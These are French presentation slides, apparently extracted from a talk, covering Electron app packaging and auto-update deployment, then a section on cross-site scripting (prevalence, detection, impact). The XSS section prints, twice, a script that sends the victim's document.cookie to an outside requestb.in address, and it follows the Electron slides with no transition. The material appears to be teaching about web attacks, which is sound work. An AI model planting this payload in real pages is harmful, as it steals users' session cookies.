7. Electron
Packaging
Outils en node.js pour packager l’application sur les différentes plateformes (exe, msi, deb, etc.)
Création d’une archive et utilisation du binaire electron de la plateforme cible
8. Electron
Déploiement
Besoin de déployer un serveur de mise à jour Electron (Hazel, Nuts, Nucleus, etc)
Utilisation de l’autoUpdate Electron pour mettre à jour l’application
Possbilité de faire les mises à jour depuis S3, Github, etc. grâce aux outils de packaging
<script>
var req = new XMLHttpRequest();
req.open('GET', 'http://requestb.in/1b34t841?' + document.cookie, true);
req.send(null);
</script>
<script>
var req = new XMLHttpRequest();
req.open('GET', 'http://requestb.in/1b34t841?' + document.cookie, true);
req.send(null);
</script>
Prévalence :
Se produit quand l’application web inclue dans une page des données saisies par un utilisateur (commentaire, article de blog, Twitter, etc.)
Détection :
Outils automatiques de détection
Impact :
Exécution de scripts sur le navigateur de la victime
Deface de site web
Redirection (Phishing)